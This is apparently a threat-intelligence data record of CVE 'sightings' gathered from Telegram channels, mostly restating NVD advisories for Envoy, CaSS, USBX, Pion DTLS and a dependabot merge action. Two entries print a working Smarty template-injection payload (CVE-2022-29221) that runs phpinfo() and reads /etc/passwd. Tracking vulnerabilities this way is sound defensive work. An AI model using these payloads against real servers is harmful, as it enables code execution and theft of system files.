{"vulnerability": "CVE-2022-2922", "sightings": [{"uuid": "3754f331-a85b-4635-a627-662c91c8b190", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29221", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9613", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day: CVE-2022-29221 Proof of Concept Code.\n\nhttps://github.com/sbani/CVE-2022-29221-PoC", "creation_timestamp": "2022-05-28T06:16:34.000000Z"}, {"uuid": "4c58e701-d2fb-4abf-8f8e-b3aee32cf6e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29221", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2280", "content": "GitHub monitoring alert!!!\n\nUpdated: CVE-2022\nDescription: CVE-2022-29221 Proof of Concept Code\nURL: https://github.com/sbani/CVE-2022-29221-PoC\n\nTags: #CVE-2022", "creation_timestamp": "2022-05-25T06:03:59.000000Z"}, {"uuid": "70f969ff-95fd-4446-97aa-f276d845e732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-2922", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17013", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-2922\n\ud83d\udd25 CVSS Score: 4.9 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Relative Path Traversal in GitHub repository dnnsoftware/dnn.platform prior to 9.11.0.\n\ud83d\udccf Published: 2022-09-30T06:45:13.000Z\n\ud83d\udccf Modified: 2025-05-20T16:03:33.907Z\n\ud83d\udd17 References:\n1. https://huntr.dev/bounties/74918f40-dc11-4218-abef-064eb71a0703\n2. 
https://github.com/dnnsoftware/dnn.platform/commit/9b17351592fbde376506ba6705dbcc7a74a2a195", "creation_timestamp": "2025-05-20T16:41:02.000000Z"}, {"uuid": "ce107b09-c218-46f1-88c7-1cdc4211c034", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29225", "type": "seen", "source": "https://t.me/cibsecurity/44154", "content": "\u203c CVE-2022-29225 \u203c\n\nEnvoy is a cloud-native high-performance proxy. In versions prior to 1.22.1 decompressors accumulate decompressed data into an intermediate buffer before overwriting the body in the decode/encodeBody. This may allow an attacker to zip bomb the decompressor by sending a small highly compressed payload. Maliciously constructed zip files may exhaust system memory and cause a denial of service. Users are advised to upgrade. Users unable to upgrade may consider disabling decompression.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-10T00:33:45.000000Z"}, {"uuid": "9a71dc95-3c9c-4622-b1ea-1f534649575d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29227", "type": "seen", "source": "https://t.me/cibsecurity/44152", "content": "\u203c CVE-2022-29227 \u203c\n\nEnvoy is a cloud-native high-performance edge/middle/service proxy. In versions prior to 1.22.1 if Envoy attempts to send an internal redirect of an HTTP request consisting of more than HTTP headers, there\u2019s a lifetime bug which can be triggered. If while replaying the request Envoy sends a local reply when the redirect headers are processed, the downstream state indicates that the downstream stream is not complete. On sending the local reply, Envoy will attempt to reset the upstream stream, but as it is actually complete, and deleted, this results in a use-after-free. 
Users are advised to upgrade. Users unable to upgrade are advised to disable internal redirects if crashes are observed.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-10T00:33:43.000000Z"}, {"uuid": "7c7b6b1a-dd80-427a-9093-5e912a1fe854", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29228", "type": "seen", "source": "https://t.me/cibsecurity/44147", "content": "\u203c CVE-2022-29228 \u203c\n\nEnvoy is a cloud-native high-performance proxy. In versions prior to 1.22.1 the OAuth filter would try to invoke the remaining filters in the chain after emitting a local response, which triggers an ASSERT() in newer versions and corrupts memory on earlier versions. continueDecoding() shouldn\u2019t ever be called from filters after a local reply has been sent. Users are advised to upgrade. There are no known workarounds for this issue.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-10T00:33:38.000000Z"}, {"uuid": "746b8b00-7d35-453f-b3eb-e7d4faef6fc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29226", "type": "seen", "source": "https://t.me/cibsecurity/44145", "content": "\u203c CVE-2022-29226 \u203c\n\nEnvoy is a cloud-native high-performance proxy. In versions prior to 1.22.1 the OAuth filter implementation does not include a mechanism for validating access tokens, so by design when the HMAC signed cookie is missing a full authentication flow should be triggered. However, the current implementation assumes that access tokens are always validated thus allowing access in the presence of any access token attached to the request. Users are advised to upgrade. 
There is no known workaround for this issue.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-10T00:33:36.000000Z"}, {"uuid": "dd811351-efce-43a9-8c7a-07068272a93f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29229", "type": "seen", "source": "https://t.me/cibsecurity/42960", "content": "\u203c CVE-2022-29229 \u203c\n\nCaSS is a Competency and Skills System. CaSS Library, (npm:cassproject) has a missing cryptographic step when storing cryptographic keys that can allow a server administrator access to an account\u2019s cryptographic keys. This affects CaSS servers using standalone username/password authentication, which uses a method that expects e2e cryptographic security of authorization credentials. The issue has been patched in 1.5.8, however, the vulnerable accounts are only resecured when the user next logs in using standalone authentication, as the data required to resecure the account is not available to the server. The issue may be mitigated by using SSO or client side certificates to log in. Please note that SSO and client side certificate authentication does not have this expectation of no-knowledge credential access, and cryptographic keys are available to the server administrator.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-19T00:28:47.000000Z"}, {"uuid": "8d80834f-1d39-4fc0-9859-c2c636692952", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29223", "type": "seen", "source": "https://t.me/cibsecurity/43261", "content": "\u203c CVE-2022-29223 \u203c\n\nAzure RTOS USBX is a USB host, device, and on-the-go (OTG) embedded stack. 
In versions prior to 6.1.10, an attacker can cause a buffer overflow by providing the Azure RTOS USBX host stack a HUB descriptor with `bNbPorts` set to a value greater than `UX_MAX_TT` which defaults to 8. For a `bNbPorts` value of 255, the implementation of `ux_host_class_hub_descriptor_get` function will modify the contents of `hub` -> `ux_host_class_hub_device` -> `ux_device_hub_tt` array violating the end boundary by 255 - `UX_MAX_TT` items. The USB host stack needs to validate the number of ports reported by the hub, and if the value is larger than UX_MAX_TT, USB stack needs to reject the request. This fix has been included in USBX release 6.1.10.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-24T18:37:11.000000Z"}, {"uuid": "cf4a69c2-c453-4dc7-bf70-f560d9ea2451", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29222", "type": "seen", "source": "https://t.me/cibsecurity/43136", "content": "\u203c CVE-2022-29222 \u203c\n\nPion DTLS is a Go implementation of Datagram Transport Layer Security. Prior to version 2.1.5, a DTLS Client could provide a Certificate that it doesn't possess the private key for and Pion DTLS wouldn't reject it. This issue affects users that are using Client certificates only. The connection itself is still secure. The Certificate provided by clients can't be trusted when using a Pion DTLS server prior to version 2.1.5. Users should upgrade to version 2.1.5 to receive a patch. 
There are currently no known workarounds.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-21T07:47:54.000000Z"}, {"uuid": "4329fe65-9fcd-4873-b0c9-8d1560826241", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29221", "type": "published-proof-of-concept", "source": "https://t.me/poxek/1773", "content": "Smarty PHP Code Injection\n< 3.1.45 / >= 4.0.0 / < 4.1.1\nCVE-2022-29221\nPoC:\n{block name='*/phpinfo();/*'}{/block}\n{include file='string:*/include\"/etc/passwd\";exit;/*' inline=1}\nhttps://github.com/advisories/GHSA-634x-pc3q-cf4c\n\n\u0414\u043d\u0435\u0432\u043d\u0438\u043a \u0411\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u0430 \ud83d\udee1", "creation_timestamp": "2022-06-19T19:04:30.000000Z"}, {"uuid": "90df5c15-e6d9-4a34-a3f6-732325807902", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29224", "type": "seen", "source": "https://t.me/cibsecurity/44137", "content": "\u203c CVE-2022-29224 \u203c\n\nEnvoy is a cloud-native high-performance proxy. Versions of envoy prior to 1.22.1 are subject to a segmentation fault in the GrpcHealthCheckerImpl. Envoy can perform various types of upstream health checking. One of them uses gRPC. Envoy also has a feature which can \u201chold\u201d (prevent removal) upstream hosts obtained via service discovery until configured active health checking fails. If an attacker controls an upstream host and also controls service discovery of that host (via DNS, the EDS API, etc.), an attacker can crash Envoy by forcing removal of the host from service discovery, and then failing the gRPC health check request. This will crash Envoy via a null pointer dereference. 
Users are advised to upgrade to resolve this vulnerability. Users unable to upgrade may disable gRPC health checking and/or replace it with a different health checking type as a mitigation.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-09T22:33:30.000000Z"}, {"uuid": "d8b20c8a-9818-4dcd-9f7a-15f2ed926bb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29221", "type": "published-proof-of-concept", "source": "https://t.me/antichat/9882", "content": "Smarty PHP Code Injection\n< 3.1.45 / >= 4.0.0 / < 4.1.1\nCVE-2022-29221\n\nPoC:\n\n{block name='*/phpinfo();/*'}{/block}\n{include file='string:*/include\"/etc/passwd\";exit;/*' inline=1}", "creation_timestamp": "2022-06-19T11:03:38.000000Z"}, {"uuid": "1d0660e7-f222-47af-b12c-e3bd8f8c0bb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-29220", "type": "seen", "source": "https://t.me/cibsecurity/43572", "content": "\u203c CVE-2022-29220 \u203c\n\ngithub-action-merge-dependabot is an action that automatically approves and merges dependabot pull requests (PRs). Prior to version 3.2.0, github-action-merge-dependabot does not check if a commit created by dependabot is verified with the proper GPG key. There is just a check if the actor is set to `dependabot[bot]` to determine if the PR is a legit PR. Theoretically, an owner of a seemingly valid and legit action in the pipeline can check if the PR is created by dependabot and if their own action has enough permissions to modify the PR in the pipeline. If so, they can modify the PR by adding a second seemingly valid and legit commit to the PR, as they can set arbitrarily the username and email for commits in git. 
Because the bot only checks if the actor is valid, it would pass the malicious changes through and merge the PR automatically, without getting noticed by project maintainers. It would probably not be possible to determine where the malicious commit came from, as it would only say `dependabot[bot]` and the corresponding email-address. Version 3.2.0 contains a patch for this issue.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-05-31T20:23:50.000000Z"}]}